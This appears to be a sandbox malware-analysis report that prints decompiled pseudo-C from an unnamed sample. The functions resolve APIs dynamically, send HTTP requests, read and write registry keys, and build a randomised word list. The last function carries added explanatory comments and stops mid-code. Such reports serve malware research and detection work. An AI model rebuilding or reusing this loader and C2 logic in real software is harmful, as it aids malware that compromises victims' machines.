                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                            • String ID:
                            • API String ID: 2831207796-0
                            • Opcode ID: 1674b508dcbf2622cbea67b75ebde5180d69d21b651ecfd841edf1abc5c317dc
                            • Instruction ID: d360474d6687bd43bcde2d9980f0480cc82435a6b02604bd02552b3dfd9ef27e
                            • Opcode Fuzzy Hash: 1674b508dcbf2622cbea67b75ebde5180d69d21b651ecfd841edf1abc5c317dc
                            • Instruction Fuzzy Hash: 45415331D00A09AFDB01DFB8D844AEFB7BAAF49300F14446AE911EB260DB719D05CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00401B39(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                            				intOrPtr _v8;
                            				_Unknown_base(*)()* _t29;
                            				_Unknown_base(*)()* _t33;
                            				_Unknown_base(*)()* _t36;
                            				_Unknown_base(*)()* _t39;
                            				_Unknown_base(*)()* _t42;
                            				intOrPtr _t46;
                            				struct HINSTANCE__* _t50;
                            				intOrPtr _t56;
                            
                            				_t56 = E0040181A(0x20);
                            				if(_t56 == 0) {
                            					_v8 = 8;
                            				} else {
                            					_t50 = GetModuleHandleA( *0x403184 + 0x404014);
                            					_v8 = 0x7f;
                            					_t29 = GetProcAddress(_t50,  *0x403184 + 0x404151);
                            					 *(_t56 + 0xc) = _t29;
                            					if(_t29 == 0) {
                            						L8:
                            						E0040147E(_t56);
                            					} else {
                            						_t33 = GetProcAddress(_t50,  *0x403184 + 0x404161);
                            						 *(_t56 + 0x10) = _t33;
                            						if(_t33 == 0) {
                            							goto L8;
                            						} else {
                            							_t36 = GetProcAddress(_t50,  *0x403184 + 0x404174);
                            							 *(_t56 + 0x14) = _t36;
                            							if(_t36 == 0) {
                            								goto L8;
                            							} else {
                            								_t39 = GetProcAddress(_t50,  *0x403184 + 0x404189);
                            								 *(_t56 + 0x18) = _t39;
                            								if(_t39 == 0) {
                            									goto L8;
                            								} else {
                            									_t42 = GetProcAddress(_t50,  *0x403184 + 0x40419f);
                            									 *(_t56 + 0x1c) = _t42;
                            									if(_t42 == 0) {
                            										goto L8;
                            									} else {
                            										 *((intOrPtr*)(_t56 + 8)) = _a8;
                            										 *((intOrPtr*)(_t56 + 4)) = _a4;
                            										_t46 = E00401D95(_t56, _a12); // executed
                            										_v8 = _t46;
                            										if(_t46 != 0) {
                            											goto L8;
                            										} else {
                            											 *_a16 = _t56;
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v8;
                            			}

                            APIs
                              • Part of subcall function 0040181A: HeapAlloc.KERNEL32(00000000,?,004014BA,00000030,?,00000000), ref: 00401826
                            • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004018B1,?,?,?,?,?,00000002,?,?), ref: 00401B5D
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401B7F
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401B95
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401BAB
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401BC1
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401BD7
                              • Part of subcall function 00401D95: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74CB4EE0,00000000,00000000,?), ref: 00401DF2
                              • Part of subcall function 00401D95: memset.NTDLL ref: 00401E14
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                            • String ID:
                            • API String ID: 1632424568-0
                            • Opcode ID: 69b94d7d7b042312cfe0a202c9dcd1738c3531b62b0226c4a5812b8c41c682d3
                            • Instruction ID: d3c3635dfac63004e6023c36051fb9f2085c9b8f0634433d2a6b82aac8f12b84
                            • Opcode Fuzzy Hash: 69b94d7d7b042312cfe0a202c9dcd1738c3531b62b0226c4a5812b8c41c682d3
                            • Instruction Fuzzy Hash: 34212DF160464BAFEB11DF6ADD44D6BB7ECAF44305700447AEA05EB261DB74EA00CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D2C73(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                            				void* __esi;
                            				long _t10;
                            				void* _t18;
                            				void* _t22;
                            
                            				_t9 = __eax;
                            				_t22 = __eax;
                            				if(_a4 != 0) {
                            					_t9 = E006D452E(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                            					if(_t9 == 0) {
                            						L9:
                            						return GetLastError();
                            					}
                            				}
                            				_t10 = E006D7B59(_t9, _t18, _t22, _a8); // executed
                            				if(_t10 == 0) {
                            					ResetEvent( *(_t22 + 0x1c));
                            					ResetEvent( *(_t22 + 0x20));
                            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                            						SetEvent( *(_t22 + 0x1c));
                            						goto L7;
                            					} else {
                            						_t10 = GetLastError();
                            						if(_t10 == 0x3e5) {
                            							L7:
                            							_t10 = 0;
                            						}
                            					}
                            				}
                            				if(_t10 == 0xffffffff) {
                            					goto L9;
                            				}
                            				return _t10;
                            			}
                            0x006d2c73
                            0x006d2c80
                            0x006d2c82
                            0x006d2c8d
                            0x006d2c94
                            0x006d2ce5
                            0x00000000
                            0x006d2ce5
                            0x006d2c94
                            0x006d2c9a
                            0x006d2ca1
                            0x006d2cad
                            0x006d2cb2
                            0x006d2cc8
                            0x006d2cd8
                            0x00000000
                            0x006d2cca
                            0x006d2cca
                            0x006d2cd1
                            0x006d2cde
                            0x006d2cde
                            0x006d2cde
                            0x006d2cd1
                            0x006d2cc8
                            0x006d2ce3
                            0x00000000
                            0x00000000
                            0x006d2ce9

                            APIs
                            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,006D5D46,?,?,74CF81D0,00000000), ref: 006D2CAD
                            • ResetEvent.KERNEL32(?), ref: 006D2CB2
                            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 006D2CBF
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?,?), ref: 006D2CCA
                            • GetLastError.KERNEL32(?,?,00000102,006D5D46,?,?,74CF81D0,00000000), ref: 006D2CE5
                              • Part of subcall function 006D452E: lstrlen.KERNEL32(00000000,00000008,?,74CB4D40,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?,?,74CF81D0), ref: 006D453A
                              • Part of subcall function 006D452E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,006D2C92,?,?,?,?,00000102,006D5D46,?), ref: 006D4598
                              • Part of subcall function 006D452E: lstrcpy.KERNEL32(00000000,00000000), ref: 006D45A8
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D2CD8
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 3739416942-0
                            • Opcode ID: f91a4d75e96fda17c69b30abee59cd4513ffd3a1147f97f461062e7837afc186
                            • Instruction ID: 3c3debbc2b41fdd9b1cf97798dcd5ac9b46982565289f14bfd58e0ba36acc128
                            • Opcode Fuzzy Hash: f91a4d75e96fda17c69b30abee59cd4513ffd3a1147f97f461062e7837afc186
                            • Instruction Fuzzy Hash: 4501AD31910202ABD7706B61ED45FAF77ABBFA4364F20072BF551E12E0DA20EC14DA65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 88%
                            			E006D2331(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                            				signed int _v8;
                            				char _v12;
                            				signed int* _v16;
                            				char _v284;
                            				void* __esi;
                            				char* _t59;
                            				intOrPtr* _t60;
                            				void* _t62;
                            				intOrPtr _t64;
                            				char _t65;
                            				void* _t67;
                            				intOrPtr _t68;
                            				intOrPtr _t69;
                            				intOrPtr _t71;
                            				void* _t73;
                            				signed int _t81;
                            				void* _t91;
                            				void* _t92;
                            				char _t98;
                            				signed int* _t100;
                            				intOrPtr* _t101;
                            				void* _t102;
                            
                            				_t92 = __ecx;
                            				_v8 = _v8 & 0x00000000;
                            				_t98 = _a16;
                            				if(_t98 == 0) {
                            					__imp__( &_v284,  *0x6da3dc);
                            					_t91 = 0x80000002;
                            					L6:
                            					_t59 = E006D3D2E( &_v284,  &_v284);
                            					_a8 = _t59;
                            					if(_t59 == 0) {
                            						_v8 = 8;
                            						L29:
                            						_t60 = _a20;
                            						if(_t60 != 0) {
                            							 *_t60 =  *_t60 + 1;
                            						}
                            						return _v8;
                            					}
                            					_t101 = _a24;
                            					_t62 = E006D2087(_t92, _t97, _t101, _t91, _t59); // executed
                            					if(_t62 != 0) {
                            						L27:
                            						E006D789E(_a8);
                            						goto L29;
                            					}
                            					_t64 =  *0x6da318; // 0x14a9de0
                            					_t16 = _t64 + 0xc; // 0x14a9f02
                            					_t65 = E006D3D2E(_t64,  *_t16);
                            					_a24 = _t65;
                            					if(_t65 == 0) {
                            						L14:
                            						_t29 = _t101 + 0x14; // 0x102
                            						_t33 = _t101 + 0x10; // 0x3d006d90, executed
                            						_t67 = E006D6BEB(_t97,  *_t33, _t91, _a8,  *0x6da3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
                            						if(_t67 == 0) {
                            							_t68 =  *0x6da348; // 0xdcd5a8
                            							if(_t98 == 0) {
                            								_t35 = _t68 + 0x6dba3e; // 0x4d4c4b48
                            								_t69 = _t35;
                            							} else {
                            								_t34 = _t68 + 0x6dba39; // 0x55434b48
                            								_t69 = _t34;
                            							}
                            							if(E006D41C5(_t69,  *0x6da3d4,  *0x6da3d8,  &_a24,  &_a16) == 0) {
                            								if(_t98 == 0) {
                            									_t71 =  *0x6da348; // 0xdcd5a8
                            									_t44 = _t71 + 0x6db842; // 0x74666f53
                            									_t73 = E006D3D2E(_t44, _t44);
                            									_t99 = _t73;
                            									if(_t73 == 0) {
                            										_v8 = 8;
                            									} else {
                            										_t47 = _t101 + 0x10; // 0x3d006d90
                            										E006D187F( *_t47, _t91, _a8,  *0x6da3d8, _a24);
                            										_t49 = _t101 + 0x10; // 0x3d006d90
                            										E006D187F( *_t49, _t91, _t99,  *0x6da3d0, _a16);
                            										E006D789E(_t99);
                            									}
                            								} else {
                            									_t40 = _t101 + 0x10; // 0x3d006d90
                            									E006D187F( *_t40, _t91, _a8,  *0x6da3d8, _a24);
                            									_t43 = _t101 + 0x10; // 0x3d006d90, executed
                            									E006D187F( *_t43, _t91, _a8,  *0x6da3d0, _a16); // executed
                            								}
                            								if( *_t101 != 0) {
                            									E006D789E(_a24);
                            								} else {
                            									 *_t101 = _a16;
                            								}
                            							}
                            						}
                            						goto L27;
                            					}
                            					_t21 = _t101 + 0x10; // 0x3d006d90, executed
                            					_t81 = E006D78B3( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
                            					if(_t81 == 0) {
                            						_t100 = _v16;
                            						if(_v12 == 0x28) {
                            							 *_t100 =  *_t100 & _t81;
                            							_t26 = _t101 + 0x10; // 0x3d006d90
                            							E006D6BEB(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                            						}
                            						E006D789E(_t100);
                            						_t98 = _a16;
                            					}
                            					E006D789E(_a24);
                            					goto L14;
                            				}
                            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                            					goto L29;
                            				} else {
                            					_t97 = _a8;
                            					E006D7A86(_t98, _a8,  &_v284);
                            					__imp__(_t102 + _t98 - 0x117,  *0x6da3dc);
                            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                            					_t91 = 0x80000003;
                            					goto L6;
                            				}
                            			}
                            0x006d2331
                            0x006d233a
                            0x006d2341
                            0x006d2346
                            0x006d23b3
                            0x006d23b9
                            0x006d23be
                            0x006d23c5
                            0x006d23ca
                            0x006d23cf
                            0x006d253a
                            0x006d2541
                            0x006d2541
                            0x006d2546
                            0x006d2548
                            0x006d2548
                            0x006d2551
                            0x006d2551
                            0x006d23d5
                            0x006d23da
                            0x006d23e1
                            0x006d2530
                            0x006d2533
                            0x00000000
                            0x006d2533
                            0x006d23e7
                            0x006d23ec
                            0x006d23ef
                            0x006d23f4
                            0x006d23f9
                            0x006d2442
                            0x006d2442
                            0x006d2455
                            0x006d2458
                            0x006d245f
                            0x006d2465
                            0x006d246c
                            0x006d2476
                            0x006d2476
                            0x006d246e
                            0x006d246e
                            0x006d246e
                            0x006d246e
                            0x006d2498
                            0x006d24a0
                            0x006d24ce
                            0x006d24d3
                            0x006d24da
                            0x006d24df
                            0x006d24e3
                            0x006d2515
                            0x006d24e5
                            0x006d24f2
                            0x006d24f5
                            0x006d2505
                            0x006d2508
                            0x006d250e
                            0x006d250e
                            0x006d24a2
                            0x006d24af
                            0x006d24b2
                            0x006d24c4
                            0x006d24c7
                            0x006d24c7
                            0x006d251f
                            0x006d252b
                            0x006d2521
                            0x006d2524
                            0x006d2524
                            0x006d251f
                            0x006d2498
                            0x00000000
                            0x006d245f
                            0x006d2408
                            0x006d240b
                            0x006d2412
                            0x006d2418
                            0x006d241b
                            0x006d241d
                            0x006d2429
                            0x006d242c
                            0x006d242c
                            0x006d2432
                            0x006d2437
                            0x006d2437
                            0x006d243d
                            0x00000000
                            0x006d243d
                            0x006d234b
                            0x00000000
                            0x006d2372
                            0x006d2372
                            0x006d237e
                            0x006d2391
                            0x006d2397
                            0x006d239f
                            0x00000000
                            0x006d239f

                            APIs
                            • StrChrA.SHLWAPI(006D68B1,0000005F,00000000,00000000,00000104), ref: 006D2364
                            • lstrcpy.KERNEL32(?,?), ref: 006D2391
                              • Part of subcall function 006D3D2E: lstrlen.KERNEL32(?,00000000,014A9DE0,00000000,006D695F,014AA003,69B25F44,?,?,?,?,69B25F44,00000005,006DA00C,4D283A53,?), ref: 006D3D35
                              • Part of subcall function 006D3D2E: mbstowcs.NTDLL ref: 006D3D5E
                              • Part of subcall function 006D3D2E: memset.NTDLL ref: 006D3D70
                              • Part of subcall function 006D187F: lstrlenW.KERNEL32(?,?,?,006D24FA,3D006D90,80000002,006D68B1,006D1629,74666F53,4D4C4B48,006D1629,?,3D006D90,80000002,006D68B1,?), ref: 006D18A4
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • lstrcpy.KERNEL32(?,00000000), ref: 006D23B3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                            • String ID: ($\
                            • API String ID: 3924217599-1512714803
                            • Opcode ID: 4e346372de6170dcf082c275717bbd7bb691cdf52b3c28ecfb91e78806943461
                            • Instruction ID: 812d12163b9cddcb9c95a506207606d2f5efba08088cd75b0f6c8e696a69d300
                            • Opcode Fuzzy Hash: 4e346372de6170dcf082c275717bbd7bb691cdf52b3c28ecfb91e78806943461
                            • Instruction Fuzzy Hash: 82515A32D0020AEFCF219FA0EC50EAA7BBBEF58300F10856AF91596321D731D925EB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E006D10AD(signed int __edx) {
                            				signed int _v8;
                            				long _v12;
                            				CHAR* _v16;
                            				long _v20;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t21;
                            				CHAR* _t22;
                            				CHAR* _t25;
                            				intOrPtr _t26;
                            				void* _t27;
                            				void* _t31;
                            				intOrPtr _t32;
                            				void* _t33;
                            				CHAR* _t37;
                            				CHAR* _t43;
                            				CHAR* _t44;
                            				CHAR* _t45;
                            				void* _t50;
                            				void* _t52;
                            				signed char _t57;
                            				intOrPtr _t59;
                            				signed int _t60;
                            				void* _t64;
                            				CHAR* _t68;
                            				CHAR* _t69;
                            				char* _t70;
                            				void* _t71;
                            
                            				_t62 = __edx;
                            				_v20 = 0;
                            				_v8 = 0;
                            				_v12 = 0;
                            				_t21 = E006D39E3();
                            				if(_t21 != 0) {
                            					_t60 =  *0x6da2fc; // 0x2000000a
                            					_t56 = (_t60 & 0xf0000000) + _t21;
                            					 *0x6da2fc = (_t60 & 0xf0000000) + _t21;
                            				}
                            				_t22 =  *0x6da178(0, 2); // executed
                            				_v16 = _t22;
                            				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                            					_t25 = E006D40F0( &_v8,  &_v20); // executed
                            					_t55 = _t25;
                            					_t26 =  *0x6da348; // 0xdcd5a8
                            					if( *0x6da2fc > 5) {
                            						_t8 = _t26 + 0x6db5c5; // 0x4d283a53
                            						_t27 = _t8;
                            					} else {
                            						_t7 = _t26 + 0x6db9ef; // 0x44283a44
                            						_t27 = _t7;
                            					}
                            					E006D65DB(_t27, _t27);
                            					_t31 = E006D60A1(_t62,  &_v20,  &_v12); // executed
                            					if(_t31 == 0) {
                            						CloseHandle(_v20);
                            					}
                            					_t64 = 5;
                            					if(_t55 != _t64) {
                            						_t32 = E006D1F1D();
                            						 *0x6da310 =  *0x6da310 ^ 0x81bbe65d;
                            						 *0x6da36c = _t32;
                            						_t33 = E006D7A71(0x60);
                            						 *0x6da3cc = _t33;
                            						__eflags = _t33;
                            						if(_t33 == 0) {
                            							_push(8);
                            							_pop(0);
                            						} else {
                            							memset(_t33, 0, 0x60);
                            							_t50 =  *0x6da3cc; // 0x14a9600
                            							_t71 = _t71 + 0xc;
                            							__imp__(_t50 + 0x40);
                            							_t52 =  *0x6da3cc; // 0x14a9600
                            							 *_t52 = 0x6db827;
                            						}
                            						_t55 = 0;
                            						__eflags = 0;
                            						if(0 == 0) {
                            							_t37 = RtlAllocateHeap( *0x6da2d8, 0, 0x43);
                            							 *0x6da368 = _t37;
                            							__eflags = _t37;
                            							if(_t37 == 0) {
                            								_push(8);
                            								_pop(0);
                            							} else {
                            								_t57 =  *0x6da2fc; // 0x2000000a
                            								_t62 = _t57 & 0x000000ff;
                            								_t59 =  *0x6da348; // 0xdcd5a8
                            								_t13 = _t59 + 0x6db552; // 0x697a6f4d
                            								_t56 = _t13;
                            								wsprintfA(_t37, _t13, _t57 & 0x000000ff, _t57 & 0x000000ff, 0x6d927b);
                            							}
                            							_t55 = 0;
                            							__eflags = 0;
                            							if(0 == 0) {
                            								asm("sbb eax, eax");
                            								E006D54EC( ~_v8 &  *0x6da310, 0x6da00c); // executed
                            								_t43 = E006D2792(0, _t56, _t64, 0x6da00c); // executed
                            								_t55 = _t43;
                            								__eflags = _t55;
                            								if(_t55 != 0) {
                            									goto L30;
                            								}
                            								_t44 = E006D68F8(); // executed
                            								__eflags = _t44;
                            								if(_t44 != 0) {
                            									__eflags = _v8;
                            									_t68 = _v12;
                            									if(_v8 != 0) {
                            										L29:
                            										_t45 = E006D517A(_t62, _t68, _v8); // executed
                            										_t55 = _t45;
                            										goto L30;
                            									}
                            									__eflags = _t68;
                            									if(__eflags == 0) {
                            										goto L30;
                            									}
                            									_t55 = E006D4F6E(__eflags,  &(_t68[4]));
                            									__eflags = _t55;
                            									if(_t55 == 0) {
                            										goto L30;
                            									}
                            									goto L29;
                            								}
                            								_t55 = 8;
                            							}
                            						}
                            					} else {
                            						_t69 = _v12;
                            						if(_t69 == 0) {
                            							L30:
                            							if(_v16 == 0 || _v16 == 1) {
                            								 *0x6da17c();
                            							}
                            							goto L34;
                            						}
                            						_t70 =  &(_t69[4]);
                            						do {
                            						} while (E006D5854(_t64, _t70, 0, 1) == 0x4c7);
                            					}
                            					goto L30;
                            				} else {
                            					_t55 = _t22;
                            					L34:
                            					return _t55;
                            				}
                            			}
                            0x006d10ad
                            0x006d10b7
                            0x006d10ba
                            0x006d10bd
                            0x006d10c0
                            0x006d10c7
                            0x006d10c9
                            0x006d10d5
                            0x006d10d7
                            0x006d10d7
                            0x006d10e0
                            0x006d10e6
                            0x006d10eb
                            0x006d1105
                            0x006d1111
                            0x006d1113
                            0x006d1118
                            0x006d1122
                            0x006d1122
                            0x006d111a
                            0x006d111a
                            0x006d111a
                            0x006d111a
                            0x006d1129
                            0x006d1136
                            0x006d113d
                            0x006d1142
                            0x006d1142
                            0x006d114b
                            0x006d114e
                            0x006d1174
                            0x006d1179
                            0x006d1185
                            0x006d118a
                            0x006d118f
                            0x006d1194
                            0x006d1196
                            0x006d11c2
                            0x006d11c4
                            0x006d1198
                            0x006d119c
                            0x006d11a1
                            0x006d11a6
                            0x006d11ad
                            0x006d11b3
                            0x006d11b8
                            0x006d11be
                            0x006d11c5
                            0x006d11c7
                            0x006d11c9
                            0x006d11d8
                            0x006d11de
                            0x006d11e3
                            0x006d11e5
                            0x006d1215
                            0x006d1217
                            0x006d11e7
                            0x006d11e7
                            0x006d11ed
                            0x006d11fa
                            0x006d1200
                            0x006d1200
                            0x006d1208
                            0x006d1211
                            0x006d1218
                            0x006d121a
                            0x006d121c
                            0x006d1223
                            0x006d1230
                            0x006d1235
                            0x006d123a
                            0x006d123c
                            0x006d123e
                            0x00000000
                            0x00000000
                            0x006d1240
                            0x006d1245
                            0x006d1247
                            0x006d124e
                            0x006d1252
                            0x006d1255
                            0x006d126a
                            0x006d126e
                            0x006d1273
                            0x00000000
                            0x006d1273
                            0x006d1257
                            0x006d1259
                            0x00000000
                            0x00000000
                            0x006d1264
                            0x006d1266
                            0x006d1268
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d1268
                            0x006d124b
                            0x006d124b
                            0x006d121c
                            0x006d1150
                            0x006d1150
                            0x006d1155
                            0x006d1275
                            0x006d127a
                            0x006d1282
                            0x006d1282
                            0x00000000
                            0x006d127a
                            0x006d115b
                            0x006d115e
                            0x006d1168
                            0x006d116f
                            0x00000000
                            0x006d128a
                            0x006d128a
                            0x006d128d
                            0x006d1291
                            0x006d1291

                            APIs
                              • Part of subcall function 006D39E3: GetModuleHandleA.KERNEL32(4C44544E,00000000,006D10C5,00000001), ref: 006D39F2
                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 006D1142
                              • Part of subcall function 006D1F1D: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 006D1F41
                              • Part of subcall function 006D1F1D: wsprintfA.USER32 ref: 006D1FA5
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • memset.NTDLL ref: 006D119C
                            • RtlInitializeCriticalSection.NTDLL(014A95C0), ref: 006D11AD
                              • Part of subcall function 006D4F6E: memset.NTDLL ref: 006D4F88
                              • Part of subcall function 006D4F6E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 006D4FCE
                              • Part of subcall function 006D4F6E: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 006D4FD9
                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 006D11D8
                            • wsprintfA.USER32 ref: 006D1208
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
                            • String ID:
                            • API String ID: 1825273115-0
                            • Opcode ID: 19423cf1ed3d7a8845c30e062e61be0ab6f7c9d74e4b8ca3ae4c9d278546a3ec
                            • Instruction ID: 8668d2acc4aaeee92904de8a052aa8c3b2a7c98c07db518ac945a6b23be4d1c7
                            • Opcode Fuzzy Hash: 19423cf1ed3d7a8845c30e062e61be0ab6f7c9d74e4b8ca3ae4c9d278546a3ec
                            • Instruction Fuzzy Hash: 2B51F971E45214BBDB20ABE4DC45BAE77ABAB0A700F14442BF101DB351D7B29A81CB55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 22%
                            			// __eax: LCG seed; _a4: CR/LF-delimited word buffer; _a8: its length.
                            			// Trailing "0x006d...." comments are the listing's per-statement address column.
                            			E006D3EE9(signed int __eax, signed int _a4, signed int _a8) {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				signed int _v20;
                            				intOrPtr _t81;
                            				char _t83;
                            				signed int _t90;
                            				signed int _t97;
                            				signed int _t99;
                            				char _t101;
                            				unsigned int _t102;
                            				intOrPtr _t103;
                            				char* _t107;
                            				signed int _t110;
                            				signed int _t113;
                            				signed int _t118;
                            				signed int _t122;
                            				intOrPtr _t124;
                            
                            				_t102 = _a8; // 0x006d3ef0 (buffer length)
                            				_t118 = 0; // 0x006d3ef7 (length of the word being scanned)
                            				_v20 = __eax; // 0x006d3efc (LCG state, seeded from eax)
                            				_t122 = (_t102 >> 2) + 1; // 0x006d3eff (capacity of the word pointer table)
                            				_v8 = 0; // 0x006d3f06 (longest word seen so far)
                            				_a8 = 0; // 0x006d3f09 (word count)
                            				_t81 = E006D7A71(_t122 << 2); // 0x006d3f0c (heap allocation, RtlAllocateHeap in the subcall list)
                            				_v16 = _t81; // 0x006d3f11
                            				if(_t81 == 0) { // 0x006d3f16
                            					_push(8); // 0x006d406a (8 = ERROR_NOT_ENOUGH_MEMORY)
                            					_pop(0); // 0x006d406c
                            					L37: // 0x006d406e
                            					return 0; // 0x006d4073
                            				} // 0x006d4073
                            				_t107 = _a4; // 0x006d3f1c (cursor into the word buffer)
                            				_a4 = _t102; // 0x006d3f1f (bytes remaining)
                            				_t113 = 0; // 0x006d3f22 (words stored in the pointer table)
                            				while(1) { // 0x006d3f24
                            					_t83 =  *_t107; // 0x006d3f24
                            					if(_t83 == 0) { // 0x006d3f28 (NUL ends the scan)
                            						break;
                            					}
                            					if(_t83 == 0xd || _t83 == 0xa) { // 0x006d3f2c (CR or LF: end of a word)
                            						if(_t118 != 0) { // 0x006d3f58
                            							if(_t118 > _v8) { // 0x006d3f5d
                            								_v8 = _t118; // 0x006d3f5f
                            							} // 0x006d3f5f
                            							_a8 = _a8 + 1; // 0x006d3f62
                            							_t118 = 0; // 0x006d3f65
                            						} // 0x006d3f65
                            						 *_t107 = 0; // 0x006d3f67 (the delimiter becomes the word's NUL terminator)
                            						goto L16;
                            					} else { // 0x006d3f32
                            						if(_t118 != 0) { // 0x006d3f34 (inside a word: just advance)
                            							L10: // 0x006d3f53
                            							_t118 = _t118 + 1; // 0x006d3f53
                            							L16: // 0x006d3f6a
                            							_t107 = _t107 + 1; // 0x006d3f6a
                            							_t15 =  &_a4; // 0x006d3f6b
                            							 *_t15 = _a4 - 1; // 0x006d3f6b
                            							if( *_t15 != 0) { // 0x006d3f6e
                            								continue;
                            							}
                            							break;
                            						} // 0x006d3f6e
                            						if(_t113 == _t122) { // 0x006d3f38 (pointer table full: stop scanning)
                            							L21: // 0x006d3f7f
                            							if(_a8 <= 0x20) { // 0x006d3f83 (32 words or fewer is rejected)
                            								_push(0xb); // 0x006d405d (0xb = ERROR_BAD_FORMAT)
                            								L34: // 0x006d405f
                            								_pop(0); // 0x006d405f
                            								L35: // 0x006d4060
                            								E006D789E(_v16); // 0x006d4063 (frees the pointer table; RtlFreeHeap per the 006D789E subcall entry below)
                            								goto L37;
                            							} // 0x006d4063
                            							_t24 = _v8 + 5; // 0xcdd8d2f8 @ 0x006d3f8c
                            							_t103 = E006D7A71((_v8 + _t24) * _a8 + 4); // 0x006d3f9d (_a8 pointer slots, then 2 * longest + 1 bytes per name, plus 4)
                            							if(_t103 == 0) { // 0x006d3fa1
